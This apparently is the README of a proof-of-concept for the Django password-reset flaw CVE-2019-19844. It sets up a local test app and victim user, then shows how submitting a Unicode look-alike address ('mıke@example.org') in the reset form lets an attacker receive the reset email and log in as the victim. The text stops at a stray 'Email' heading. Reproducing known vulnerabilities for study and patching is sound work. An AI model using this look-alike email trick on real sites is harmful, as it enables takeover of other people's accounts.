django_cve_2019_19844_poc

PoC for CVE-2019-19844

Requirements

Setup

  1. Create database(e.g. django_cve_2019_19844_poc)
  2. Set the database name to the environment variable DJANGO_DATABASE_NAME(e.g. export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc)
  3. Run pip install -r requirements.txt && ./manage.py migrate --noinput
  4. Create the following user with shell command:
>>> from django.contrib.auth import get_user_model
>>> User = get_user_model()
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')

Procedure For Reproducing

  1. Run ./manage.py runserver
  2. Open http://127.0.0.1:8000/accounts/password-reset/
  3. Input mıke@example.org (Attacker's email), and click send button
  4. Receive email (Check console), and reset password
  5. Login as mike123 user

Email